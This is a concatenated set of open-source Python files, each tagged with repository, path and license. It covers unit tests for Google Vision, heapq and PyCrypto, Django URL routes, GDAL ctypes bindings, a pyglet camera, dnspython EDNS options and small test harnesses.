if max_score == score:
json_object2 = dict2[k2]
used_keys2.append(k2)
copy_json_object(json_object1, json_object2, key_prepend=key_prepend)
if add_unused:
# unused values from dict2 will be added in dict1 with a key 'unknown##'
# where ## is a sequence nr
# first find any 'unknown##' keys in dict1
# and determine the starting value
unknowns_in_keys1 = [k for k in keys1 if k.startswith(unknown)]
l = len(unknown)
unknown_numbers_in_keys1 = [int(k[l:]) for k in unknowns_in_keys1]
if unknown_numbers_in_keys1:
start_unknown_value = max(unknown_numbers_in_keys1)+1
else:
start_unknown_value = 1
unused_keys2 = list(set(keys2)-set(used_keys2))
for i, key2 in enumerate(unused_keys2, start=start_unknown_value):
json_object1 = copy(empty_json_object1)
json_object2 = dict2[key2]
copy_json_object(json_object1, json_object2, key_prepend=key_prepend)
dict1[unknown+str(i)] = json_object1
def column(matrix, i):
return [row[i] for row in matrix]
| mit |
tseaver/gcloud-python | vision/tests/unit/gapic/v1p3beta1/test_image_annotator_client_v1p3beta1.py | 1 | 4686 | # -*- coding: utf-8 -*-
#
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit tests."""
import pytest
from google.rpc import status_pb2
from google.cloud import vision_v1p3beta1
from google.cloud.vision_v1p3beta1.proto import image_annotator_pb2
from google.longrunning import operations_pb2
class MultiCallableStub(object):
"""Stub for the grpc.UnaryUnaryMultiCallable interface."""
def __init__(self, method, channel_stub):
self.method = method
self.channel_stub = channel_stub
def __call__(self, request, timeout=None, metadata=None, credentials=None):
self.channel_stub.requests.append((self.method, request))
response = None
if self.channel_stub.responses:
response = self.channel_stub.responses.pop()
if isinstance(response, Exception):
raise response
if response:
return response
class ChannelStub(object):
"""Stub for the grpc.Channel interface."""
def __init__(self, responses=[]):
self.responses = responses
self.requests = []
def unary_unary(self,
method,
request_serializer=None,
response_deserializer=None):
return MultiCallableStub(method, self)
class CustomException(Exception):
pass
class TestImageAnnotatorClient(object):
def test_batch_annotate_images(self):
# Setup Expected Response
expected_response = {}
expected_response = image_annotator_pb2.BatchAnnotateImagesResponse(
**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = vision_v1p3beta1.ImageAnnotatorClient(channel=channel)
# Setup Request
requests = []
response = client.batch_annotate_images(requests)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = image_annotator_pb2.BatchAnnotateImagesRequest(
requests=requests)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_batch_annotate_images_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = vision_v1p3beta1.ImageAnnotatorClient(channel=channel)
# Setup request
requests = []
with pytest.raises(CustomException):
client.batch_annotate_images(requests)
def test_async_batch_annotate_files(self):
# Setup Expected Response
expected_response = {}
expected_response = image_annotator_pb2.AsyncBatchAnnotateFilesResponse(
**expected_response)
operation = operations_pb2.Operation(
name='operations/test_async_batch_annotate_files', done=True)
operation.response.Pack(expected_response)
# Mock the API response
channel = ChannelStub(responses=[operation])
client = vision_v1p3beta1.ImageAnnotatorClient(channel=channel)
# Setup Request
requests = []
response = client.async_batch_annotate_files(requests)
result = response.result()
assert expected_response == result
assert len(channel.requests) == 1
expected_request = image_annotator_pb2.AsyncBatchAnnotateFilesRequest(
requests=requests)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_async_batch_annotate_files_exception(self):
# Setup Response
error = status_pb2.Status()
operation = operations_pb2.Operation(
name='operations/test_async_batch_annotate_files_exception',
done=True)
operation.error.CopyFrom(error)
# Mock the API response
channel = ChannelStub(responses=[operation])
client = vision_v1p3beta1.ImageAnnotatorClient(channel=channel)
# Setup Request
requests = []
response = client.async_batch_annotate_files(requests)
exception = response.exception()
assert exception.errors[0] == error
| apache-2.0 |
kmaglione/olympia | apps/editors/urls.py | 13 | 3948 | from django.conf.urls import url
from addons.urls import ADDON_ID
from editors import views, views_themes
# All URLs under /editors/
urlpatterns = (
url(r'^$', views.home, name='editors.home'),
url(r'^queue$', views.queue, name='editors.queue'),
url(r'^queue/nominated$', views.queue_nominated,
name='editors.queue_nominated'),
url(r'^queue/pending$', views.queue_pending,
name='editors.queue_pending'),
url(r'^queue/preliminary$', views.queue_prelim,
name='editors.queue_prelim'),
url(r'^queue/fast$', views.queue_fast_track,
name='editors.queue_fast_track'),
url(r'^queue/reviews$', views.queue_moderated,
name='editors.queue_moderated'),
url(r'^queue/application_versions\.json$', views.application_versions_json,
name='editors.application_versions_json'),
url(r'^unlisted_queue$', views.unlisted_queue,
name='editors.unlisted_queue'),
url(r'^unlisted_queue/nominated$', views.unlisted_queue_nominated,
name='editors.unlisted_queue_nominated'),
url(r'^unlisted_queue/pending$', views.unlisted_queue_pending,
name='editors.unlisted_queue_pending'),
url(r'^unlisted_queue/preliminary$', views.unlisted_queue_prelim,
name='editors.unlisted_queue_prelim'),
url(r'^logs$', views.eventlog, name='editors.eventlog'),
url(r'^log/(\d+)$', views.eventlog_detail, name='editors.eventlog.detail'),
url(r'^reviewlog$', views.reviewlog, name='editors.reviewlog'),
url(r'^beta_signed_log$', views.beta_signed_log,
name='editors.beta_signed_log'),
url(r'^queue_version_notes/%s?$' % ADDON_ID, views.queue_version_notes,
name='editors.queue_version_notes'),
url(r'^queue_viewing$', views.queue_viewing,
name='editors.queue_viewing'),
url(r'^review_viewing$', views.review_viewing,
name='editors.review_viewing'),
url(r'^review/%s$' % ADDON_ID, views.review, name='editors.review'),
url(r'^performance/(?P<user_id>\d+)?$', views.performance,
name='editors.performance'),
url(r'^motd$', views.motd, name='editors.motd'),
url(r'^motd/save$', views.save_motd, name='editors.save_motd'),
url(r'^abuse-reports/%s$' % ADDON_ID, views.abuse_reports,
name='editors.abuse_reports'),
url(r'^leaderboard/$', views.leaderboard, name='editors.leaderboard'),
url(r'^whiteboard/%s$' % ADDON_ID, views.whiteboard,
name='editors.whiteboard'),
url('^themes$', views_themes.home,
name='editors.themes.home'),
url('^themes/pending$', views_themes.themes_list,
name='editors.themes.list'),
url('^themes/flagged$', views_themes.themes_list,
name='editors.themes.list_flagged',
kwargs={'flagged': True}),
url('^themes/updates$', views_themes.themes_list,
name='editors.themes.list_rereview',
kwargs={'rereview': True}),
url('^themes/queue/$', views_themes.themes_queue,
name='editors.themes.queue_themes'),
url('^themes/queue/flagged$', views_themes.themes_queue_flagged,
name='editors.themes.queue_flagged'),
url('^themes/queue/updates$', views_themes.themes_queue_rereview,
name='editors.themes.queue_rereview'),
url('^themes/queue/commit$', views_themes.themes_commit,
name='editors.themes.commit'),
url('^themes/queue/single/(?P<slug>[^ /]+)$', views_themes.themes_single,
name='editors.themes.single'),
url('^themes/history/(?P<username>[^ /]+)?$',
views_themes.themes_history, name='editors.themes.history'),
url(r'^themes/logs$', views_themes.themes_logs,
name='editors.themes.logs'),
url('^themes/release$', views_themes.release_locks,
name='editors.themes.release_locks'),
url('^themes/logs/deleted/$', views_themes.deleted_themes,
name='editors.themes.deleted'),
url('^themes/search/$', views_themes.themes_search,
name='editors.themes.search'),
)
| bsd-3-clause |
MicroTrustRepos/microkernel | src/l4/pkg/python/contrib/Lib/test/test_heapq.py | 56 | 13195 | """Unittests for heapq."""
import random
import unittest
from test import test_support
import sys
# We do a bit of trickery here to be able to test both the C implementation
# and the Python implementation of the module.
# Make it impossible to import the C implementation anymore.
sys.modules['_heapq'] = 0
# We must also handle the case that heapq was imported before.
if 'heapq' in sys.modules:
del sys.modules['heapq']
# Now we can import the module and get the pure Python implementation.
import heapq as py_heapq
# Restore everything to normal.
del sys.modules['_heapq']
del sys.modules['heapq']
# This is now the module with the C implementation.
import heapq as c_heapq
class TestHeap(unittest.TestCase):
module = None
def test_push_pop(self):
# 1) Push 256 random numbers and pop them off, verifying all's OK.
heap = []
data = []
self.check_invariant(heap)
for i in range(256):
item = random.random()
data.append(item)
self.module.heappush(heap, item)
self.check_invariant(heap)
results = []
while heap:
item = self.module.heappop(heap)
self.check_invariant(heap)
results.append(item)
data_sorted = data[:]
data_sorted.sort()
self.assertEqual(data_sorted, results)
# 2) Check that the invariant holds for a sorted array
self.check_invariant(results)
self.assertRaises(TypeError, self.module.heappush, [])
try:
self.assertRaises(TypeError, self.module.heappush, None, None)
self.assertRaises(TypeError, self.module.heappop, None)
except AttributeError:
pass
def check_invariant(self, heap):
# Check the heap invariant.
for pos, item in enumerate(heap):
if pos: # pos 0 has no parent
parentpos = (pos-1) >> 1
self.assert_(heap[parentpos] <= item)
def test_heapify(self):
for size in range(30):
heap = [random.random() for dummy in range(size)]
self.module.heapify(heap)
self.check_invariant(heap)
self.assertRaises(TypeError, self.module.heapify, None)
def test_naive_nbest(self):
data = [random.randrange(2000) for i in range(1000)]
heap = []
for item in data:
self.module.heappush(heap, item)
if len(heap) > 10:
self.module.heappop(heap)
heap.sort()
self.assertEqual(heap, sorted(data)[-10:])
def heapiter(self, heap):
# An iterator returning a heap's elements, smallest-first.
try:
while 1:
yield self.module.heappop(heap)
except IndexError:
pass
def test_nbest(self):
# Less-naive "N-best" algorithm, much faster (if len(data) is big
# enough <wink>) than sorting all of data. However, if we had a max
# heap instead of a min heap, it could go faster still via
# heapify'ing all of data (linear time), then doing 10 heappops
# (10 log-time steps).
data = [random.randrange(2000) for i in range(1000)]
heap = data[:10]
self.module.heapify(heap)
for item in data[10:]:
if item > heap[0]: # this gets rarer the longer we run
self.module.heapreplace(heap, item)
self.assertEqual(list(self.heapiter(heap)), sorted(data)[-10:])
self.assertRaises(TypeError, self.module.heapreplace, None)
self.assertRaises(TypeError, self.module.heapreplace, None, None)
self.assertRaises(IndexError, self.module.heapreplace, [], None)
def test_nbest_with_pushpop(self):
data = [random.randrange(2000) for i in range(1000)]
heap = data[:10]
self.module.heapify(heap)
for item in data[10:]:
self.module.heappushpop(heap, item)
self.assertEqual(list(self.heapiter(heap)), sorted(data)[-10:])
self.assertEqual(self.module.heappushpop([], 'x'), 'x')
def test_heappushpop(self):
h = []
x = self.module.heappushpop(h, 10)
self.assertEqual((h, x), ([], 10))
h = [10]
x = self.module.heappushpop(h, 10.0)
self.assertEqual((h, x), ([10], 10.0))
self.assertEqual(type(h[0]), int)
self.assertEqual(type(x), float)
h = [10];
x = self.module.heappushpop(h, 9)
self.assertEqual((h, x), ([10], 9))
h = [10];
x = self.module.heappushpop(h, 11)
self.assertEqual((h, x), ([11], 10))
def test_heapsort(self):
# Exercise everything with repeated heapsort checks
for trial in xrange(100):
size = random.randrange(50)
data = [random.randrange(25) for i in range(size)]
if trial & 1: # Half of the time, use heapify
heap = data[:]
self.module.heapify(heap)
else: # The rest of the time, use heappush
heap = []
for item in data:
self.module.heappush(heap, item)
heap_sorted = [self.module.heappop(heap) for i in range(size)]
self.assertEqual(heap_sorted, sorted(data))
def test_merge(self):
inputs = []
for i in xrange(random.randrange(5)):
row = sorted(random.randrange(1000) for j in range(random.randrange(10)))
inputs.append(row)
self.assertEqual(sorted(chain(*inputs)), list(self.module.merge(*inputs)))
self.assertEqual(list(self.module.merge()), [])
def test_merge_stability(self):
class Int(int):
pass
inputs = [[], [], [], []]
for i in range(20000):
stream = random.randrange(4)
x = random.randrange(500)
obj = Int(x)
obj.pair = (x, stream)
inputs[stream].append(obj)
for stream in inputs:
stream.sort()
result = [i.pair for i in self.module.merge(*inputs)]
self.assertEqual(result, sorted(result))
def test_nsmallest(self):
data = [(random.randrange(2000), i) for i in range(1000)]
for f in (None, lambda x: x[0] * 547 % 2000):
for n in (0, 1, 2, 10, 100, 400, 999, 1000, 1100):
self.assertEqual(self.module.nsmallest(n, data), sorted(data)[:n])
self.assertEqual(self.module.nsmallest(n, data, key=f),
sorted(data, key=f)[:n])
def test_nlargest(self):
data = [(random.randrange(2000), i) for i in range(1000)]
for f in (None, lambda x: x[0] * 547 % 2000):
for n in (0, 1, 2, 10, 100, 400, 999, 1000, 1100):
self.assertEqual(self.module.nlargest(n, data),
sorted(data, reverse=True)[:n])
self.assertEqual(self.module.nlargest(n, data, key=f),
sorted(data, key=f, reverse=True)[:n])
class TestHeapPython(TestHeap):
module = py_heapq
class TestHeapC(TestHeap):
module = c_heapq
def test_comparison_operator(self):
# Issue 3501: Make sure heapq works with both __lt__ and __le__
def hsort(data, comp):
data = map(comp, data)
self.module.heapify(data)
return [self.module.heappop(data).x for i in range(len(data))]
class LT:
def __init__(self, x):
self.x = x
def __lt__(self, other):
return self.x > other.x
class LE:
def __init__(self, x):
self.x = x
def __le__(self, other):
return self.x >= other.x
data = [random.random() for i in range(100)]
target = sorted(data, reverse=True)
self.assertEqual(hsort(data, LT), target)
self.assertEqual(hsort(data, LE), target)
#==============================================================================
class LenOnly:
"Dummy sequence class defining __len__ but not __getitem__."
def __len__(self):
return 10
class GetOnly:
"Dummy sequence class defining __getitem__ but not __len__."
def __getitem__(self, ndx):
return 10
class CmpErr:
"Dummy element that always raises an error during comparison"
def __cmp__(self, other):
raise ZeroDivisionError
def R(seqn):
'Regular generator'
for i in seqn:
yield i
class G:
'Sequence using __getitem__'
def __init__(self, seqn):
self.seqn = seqn
def __getitem__(self, i):
return self.seqn[i]
class I:
'Sequence using iterator protocol'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
def next(self):
if self.i >= len(self.seqn): raise StopIteration
v = self.seqn[self.i]
self.i += 1
return v
class Ig:
'Sequence using iterator protocol defined with a generator'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
for val in self.seqn:
yield val
class X:
'Missing __getitem__ and __iter__'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def next(self):
if self.i >= len(self.seqn): raise StopIteration
v = self.seqn[self.i]
self.i += 1
return v
class N:
'Iterator missing next()'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
class E:
'Test propagation of exceptions'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
def next(self):
3 // 0
class S:
'Test immediate stop'
def __init__(self, seqn):
pass
def __iter__(self):
return self
def next(self):
raise StopIteration
from itertools import chain, imap
def L(seqn):
'Test multiple tiers of iterators'
return chain(imap(lambda x:x, R(Ig(G(seqn)))))
class TestErrorHandling(unittest.TestCase):
# only for C implementation
module = c_heapq
def test_non_sequence(self):
for f in (self.module.heapify, self.module.heappop):
self.assertRaises(TypeError, f, 10)
for f in (self.module.heappush, self.module.heapreplace,
self.module.nlargest, self.module.nsmallest):
self.assertRaises(TypeError, f, 10, 10)
def test_len_only(self):
for f in (self.module.heapify, self.module.heappop):
self.assertRaises(TypeError, f, LenOnly())
for f in (self.module.heappush, self.module.heapreplace):
self.assertRaises(TypeError, f, LenOnly(), 10)
for f in (self.module.nlargest, self.module.nsmallest):
self.assertRaises(TypeError, f, 2, LenOnly())
def test_get_only(self):
for f in (self.module.heapify, self.module.heappop):
self.assertRaises(TypeError, f, GetOnly())
for f in (self.module.heappush, self.module.heapreplace):
self.assertRaises(TypeError, f, GetOnly(), 10)
for f in (self.module.nlargest, self.module.nsmallest):
self.assertRaises(TypeError, f, 2, GetOnly())
def test_get_only(self):
seq = [CmpErr(), CmpErr(), CmpErr()]
for f in (self.module.heapify, self.module.heappop):
self.assertRaises(ZeroDivisionError, f, seq)
for f in (self.module.heappush, self.module.heapreplace):
self.assertRaises(ZeroDivisionError, f, seq, 10)
for f in (self.module.nlargest, self.module.nsmallest):
self.assertRaises(ZeroDivisionError, f, 2, seq)
def test_arg_parsing(self):
for f in (self.module.heapify, self.module.heappop,
self.module.heappush, self.module.heapreplace,
self.module.nlargest, self.module.nsmallest):
self.assertRaises(TypeError, f, 10)
def test_iterable_args(self):
for f in (self.module.nlargest, self.module.nsmallest):
for s in ("123", "", range(1000), ('do', 1.2), xrange(2000,2200,5)):
for g in (G, I, Ig, L, R):
self.assertEqual(f(2, g(s)), f(2,s))
self.assertEqual(f(2, S(s)), [])
self.assertRaises(TypeError, f, 2, X(s))
self.assertRaises(TypeError, f, 2, N(s))
self.assertRaises(ZeroDivisionError, f, 2, E(s))
#==============================================================================
def test_main(verbose=None):
from types import BuiltinFunctionType
test_classes = [TestHeapPython, TestHeapC, TestErrorHandling]
test_support.run_unittest(*test_classes)
# verify reference counting
if verbose and hasattr(sys, "gettotalrefcount"):
import gc
counts = [None] * 5
for i in xrange(len(counts)):
test_support.run_unittest(*test_classes)
gc.collect()
counts[i] = sys.gettotalrefcount()
print counts
if __name__ == "__main__":
test_main(verbose=True)
| gpl-2.0 |
vslavik/bakefile | tests/conftest.py | 1 | 1534 | #
# This file is part of Bakefile (http://bakefile.org)
#
# Copyright (C) 2008-2013 Vaclav Slavik
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
def pytest_configure(config):
import sys, os.path
tests_path = os.path.dirname(__file__)
bkl_path = os.path.normpath(os.path.join(tests_path, '..', 'src'))
sys.path = [bkl_path, tests_path] + sys.path
import logging
log_level = logging.DEBUG if config.getvalue("debug") else logging.WARNING
logging.basicConfig(level=log_level)
| mit |
MRigal/django | django/contrib/gis/gdal/prototypes/raster.py | 320 | 4013 | """
This module houses the ctypes function prototypes for GDAL DataSource (raster)
related data structures.
"""
from ctypes import POINTER, c_char_p, c_double, c_int, c_void_p
from functools import partial
from django.contrib.gis.gdal.libgdal import GDAL_VERSION, std_call
from django.contrib.gis.gdal.prototypes.generation import (
const_string_output, double_output, int_output, void_output,
voidptr_output,
)
# For more detail about c function names and definitions see
# http://gdal.org/gdal_8h.html
# http://gdal.org/gdalwarper_8h.html
# Prepare partial functions that use cpl error codes
void_output = partial(void_output, cpl=True)
const_string_output = partial(const_string_output, cpl=True)
double_output = partial(double_output, cpl=True)
# Raster Driver Routines
register_all = void_output(std_call('GDALAllRegister'), [])
get_driver = voidptr_output(std_call('GDALGetDriver'), [c_int])
get_driver_by_name = voidptr_output(std_call('GDALGetDriverByName'), [c_char_p], errcheck=False)
get_driver_count = int_output(std_call('GDALGetDriverCount'), [])
get_driver_description = const_string_output(std_call('GDALGetDescription'), [c_void_p])
# Raster Data Source Routines
create_ds = voidptr_output(std_call('GDALCreate'), [c_void_p, c_char_p, c_int, c_int, c_int, c_int, c_void_p])
open_ds = voidptr_output(std_call('GDALOpen'), [c_char_p, c_int])
if GDAL_VERSION >= (2, 0):
close_ds = voidptr_output(std_call('GDALClose'), [c_void_p])
else:
close_ds = void_output(std_call('GDALClose'), [c_void_p])
flush_ds = int_output(std_call('GDALFlushCache'), [c_void_p])
copy_ds = voidptr_output(std_call('GDALCreateCopy'),
[c_void_p, c_char_p, c_void_p, c_int, POINTER(c_char_p), c_void_p, c_void_p]
)
add_band_ds = void_output(std_call('GDALAddBand'), [c_void_p, c_int])
get_ds_description = const_string_output(std_call('GDALGetDescription'), [c_void_p])
get_ds_driver = voidptr_output(std_call('GDALGetDatasetDriver'), [c_void_p])
get_ds_xsize = int_output(std_call('GDALGetRasterXSize'), [c_void_p])
get_ds_ysize = int_output(std_call('GDALGetRasterYSize'), [c_void_p])
get_ds_raster_count = int_output(std_call('GDALGetRasterCount'), [c_void_p])
get_ds_raster_band = voidptr_output(std_call('GDALGetRasterBand'), [c_void_p, c_int])
get_ds_projection_ref = const_string_output(std_call('GDALGetProjectionRef'), [c_void_p])
set_ds_projection_ref = void_output(std_call('GDALSetProjection'), [c_void_p, c_char_p])
get_ds_geotransform = void_output(std_call('GDALGetGeoTransform'), [c_void_p, POINTER(c_double * 6)], errcheck=False)
set_ds_geotransform = void_output(std_call('GDALSetGeoTransform'), [c_void_p, POINTER(c_double * 6)])
# Raster Band Routines
band_io = void_output(std_call('GDALRasterIO'),
[c_void_p, c_int, c_int, c_int, c_int, c_int, c_void_p, c_int, c_int, c_int, c_int, c_int]
)
get_band_xsize = int_output(std_call('GDALGetRasterBandXSize'), [c_void_p])
get_band_ysize = int_output(std_call('GDALGetRasterBandYSize'), [c_void_p])
get_band_index = int_output(std_call('GDALGetBandNumber'), [c_void_p])
get_band_description = const_string_output(std_call('GDALGetDescription'), [c_void_p])
get_band_ds = voidptr_output(std_call('GDALGetBandDataset'), [c_void_p])
get_band_datatype = int_output(std_call('GDALGetRasterDataType'), [c_void_p])
get_band_nodata_value = double_output(std_call('GDALGetRasterNoDataValue'), [c_void_p, POINTER(c_int)])
set_band_nodata_value = void_output(std_call('GDALSetRasterNoDataValue'), [c_void_p, c_double])
get_band_minimum = double_output(std_call('GDALGetRasterMinimum'), [c_void_p, POINTER(c_int)])
get_band_maximum = double_output(std_call('GDALGetRasterMaximum'), [c_void_p, POINTER(c_int)])
# Reprojection routine
reproject_image = void_output(std_call('GDALReprojectImage'),
[c_void_p, c_char_p, c_void_p, c_char_p, c_int, c_double, c_double, c_void_p, c_void_p, c_void_p]
)
auto_create_warped_vrt = voidptr_output(std_call('GDALAutoCreateWarpedVRT'),
[c_void_p, c_char_p, c_char_p, c_int, c_double, c_void_p]
)
| bsd-3-clause |
rajashreer7/autotest-client-tests | linux-tools/diffutils/diffutils.py | 4 | 1176 | #!/bin/python
import os, subprocess
import logging
from autotest.client import test
from autotest.client.shared import error
class diffutils(test.test):
"""
Autotest module for testing basic functionality
of diffutils
@author Shoji Sugiyama ([email protected])
"""
version = 1
nfail = 0
path = ''
def initialize(self):
"""
Sets the overall failure counter for the test.
"""
self.nfail = 0
logging.info('\n Test initialize successfully')
def run_once(self, test_path=''):
"""
Trigger test run
"""
try:
os.environ["LTPBIN"] = "%s/shared" %(test_path)
ret_val = subprocess.call(test_path + '/diffutils' + '/diffutils.sh', shell=True)
if ret_val != 0:
self.nfail += 1
except error.CmdError, e:
self.nfail += 1
logging.error("Test Failed: %s", e)
def postprocess(self):
if self.nfail != 0:
logging.info('\n nfails is non-zero')
raise error.TestError('\nTest failed')
else:
logging.info('\n Test completed successfully ')
| gpl-2.0 |
vickenty/ookoobah | ookoobah/camera.py | 1 | 2347 | from __future__ import division
from pyglet.gl import *
from random import uniform
from euclid import Vector3
from spring import Spring
class Camera (object):
SPEED = 0.1
CLIP = 0.01
def __init__(self, eye, center, up):
self.eye = Spring(eye, self.SPEED, self.CLIP)
self.vec = Spring(center - eye, self.SPEED, self.CLIP)
self.up = Spring(up, self.SPEED, self.CLIP)
self.ofs = Spring(0, 0.1, 0.01)
self.modelview = (GLdouble * 16)()
self.projection = (GLdouble * 16)()
self.viewport = (GLint * 4)()
self.unproj = [GLdouble(), GLdouble(), GLdouble()]
def resize(self, x, y, w, h):
glViewport(x, y, w, h)
self.viewport[:] = (x, y, w, h)
glMatrixMode(gl.GL_PROJECTION)
glLoadIdentity()
glu.gluPerspective(45.0, w / h, 0.1, 50)
glMatrixMode(gl.GL_MODELVIEW)
def move(self, eye, center, up):
self.eye.next_value = eye
self.vec.next_value = center - eye
self.up.next_value = up
def shake(self, amount):
self.ofs.value = amount
def tick(self):
self.eye.tick()
self.vec.tick()
self.up.tick()
self.ofs.tick()
def setup(self):
eye = self.eye.value + Vector3(uniform(0, 1), uniform(0, 1), uniform(0, 1)) * self.ofs.value
center = eye + self.vec.value
up = self.up.value
gluLookAt(eye.x, eye.y, eye.z,
center.x, center.y, center.z,
up.x, up.y, up.z)
glGetDoublev(GL_MODELVIEW_MATRIX, self.modelview)
glGetDoublev(GL_PROJECTION_MATRIX, self.projection)
def _unproject(self, x, y, z):
gluUnProject(x, y, z,
self.modelview,
self.projection,
self.viewport,
self.unproj[0],
self.unproj[1],
self.unproj[2]
)
return Vector3(*[v.value for v in self.unproj])
def unproject(self, (x, y)):
# http://stackoverflow.com/questions/9406269/object-picking-with-ray-casting
l0 = self._unproject(x, y, 0.1)
l1 = self._unproject(x, y, 0.9)
ld = l1 - l0
# http://en.wikipedia.org/wiki/Line%E2%80%93plane_intersection
# assuming that p0 = (0, 0, 0), and n = (0, 0, -1)
d = -l0.z / ld.z
p = l0 + ld * d
return p
| mit |
cricketclubucd/davisdragons | platform-tools/systrace/catapult/telemetry/third_party/web-page-replay/third_party/dns/edns.py | 248 | 4312 | # Copyright (C) 2009 Nominum, Inc.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND NOMINUM DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""EDNS Options"""
NSID = 3
class Option(object):
"""Base class for all EDNS option types.
"""
def __init__(self, otype):
"""Initialize an option.
@param rdtype: The rdata type
@type rdtype: int
"""
self.otype = otype
def to_wire(self, file):
"""Convert an option to wire format.
"""
raise NotImplementedError
def from_wire(cls, otype, wire, current, olen):
"""Build an EDNS option object from wire format
@param otype: The option type
@type otype: int
@param wire: The wire-format message
@type wire: string
@param current: The offet in wire of the beginning of the rdata.
@type current: int
@param olen: The length of the wire-format option data
@type olen: int
@rtype: dns.ends.Option instance"""
raise NotImplementedError
from_wire = classmethod(from_wire)
def _cmp(self, other):
"""Compare an ENDS option with another option of the same type.
Return < 0 if self < other, 0 if self == other, and > 0 if self > other.
"""
raise NotImplementedError
def __eq__(self, other):
if not isinstance(other, Option):
return False
if self.otype != other.otype:
return False
return self._cmp(other) == 0
def __ne__(self, other):
if not isinstance(other, Option):
return False
if self.otype != other.otype:
return False
return self._cmp(other) != 0
def __lt__(self, other):
if not isinstance(other, Option) or \
self.otype != other.otype:
return NotImplemented
return self._cmp(other) < 0
def __le__(self, other):
if not isinstance(other, Option) or \
self.otype != other.otype:
return NotImplemented
return self._cmp(other) <= 0
def __ge__(self, other):
if not isinstance(other, Option) or \
self.otype != other.otype:
return NotImplemented
return self._cmp(other) >= 0
def __gt__(self, other):
if not isinstance(other, Option) or \
self.otype != other.otype:
return NotImplemented
return self._cmp(other) > 0
class GenericOption(Option):
"""Generate Rdata Class
This class is used for EDNS option types for which we have no better
implementation.
"""
def __init__(self, otype, data):
super(GenericOption, self).__init__(otype)
self.data = data
def to_wire(self, file):
file.write(self.data)
def from_wire(cls, otype, wire, current, olen):
return cls(otype, wire[current : current + olen])
from_wire = classmethod(from_wire)
def _cmp(self, other):
return cmp(self.data, other.data)
_type_to_class = {
}
def get_option_class(otype):
cls = _type_to_class.get(otype)
if cls is None:
cls = GenericOption
return cls
def option_from_wire(otype, wire, current, olen):
"""Build an EDNS option object from wire format
@param otype: The option type
@type otype: int
@param wire: The wire-format message
@type wire: string
@param current: The offet in wire of the beginning of the rdata.
@type current: int
@param olen: The length of the wire-format option data
@type olen: int
@rtype: dns.ends.Option instance"""
cls = get_option_class(otype)
return cls.from_wire(otype, wire, current, olen)
| mit |
yawnosnorous/python-for-android | python-build/python-libs/gdata/src/gdata/Crypto/Util/test.py | 228 | 18297 | #
# test.py : Functions used for testing the modules
#
# Part of the Python Cryptography Toolkit
#
# Distribute and use freely; there are no restrictions on further
# dissemination and usage except those imposed by the laws of your
# country of residence. This software is provided "as is" without
# warranty of fitness for use or suitability for any purpose, express
# or implied. Use at your own risk or not at all.
#
__revision__ = "$Id: test.py,v 1.16 2004/08/13 22:24:18 akuchling Exp $"
import binascii
import string
import testdata
from Crypto.Cipher import *
def die(string):
import sys
print '***ERROR: ', string
# sys.exit(0) # Will default to continuing onward...
def print_timing (size, delta, verbose):
if verbose:
if delta == 0:
print 'Unable to measure time -- elapsed time too small'
else:
print '%.2f K/sec' % (size/delta)
def exerciseBlockCipher(cipher, verbose):
import string, time
try:
ciph = eval(cipher)
except NameError:
print cipher, 'module not available'
return None
print cipher+ ':'
str='1' # Build 128K of test data
for i in xrange(0, 17):
str=str+str
if ciph.key_size==0: ciph.key_size=16
password = 'password12345678Extra text for password'[0:ciph.key_size]
IV = 'Test IV Test IV Test IV Test'[0:ciph.block_size]
if verbose: print ' ECB mode:',
obj=ciph.new(password, ciph.MODE_ECB)
if obj.block_size != ciph.block_size:
die("Module and cipher object block_size don't match")
text='1234567812345678'[0:ciph.block_size]
c=obj.encrypt(text)
if (obj.decrypt(c)!=text): die('Error encrypting "'+text+'"')
text='KuchlingKuchling'[0:ciph.block_size]
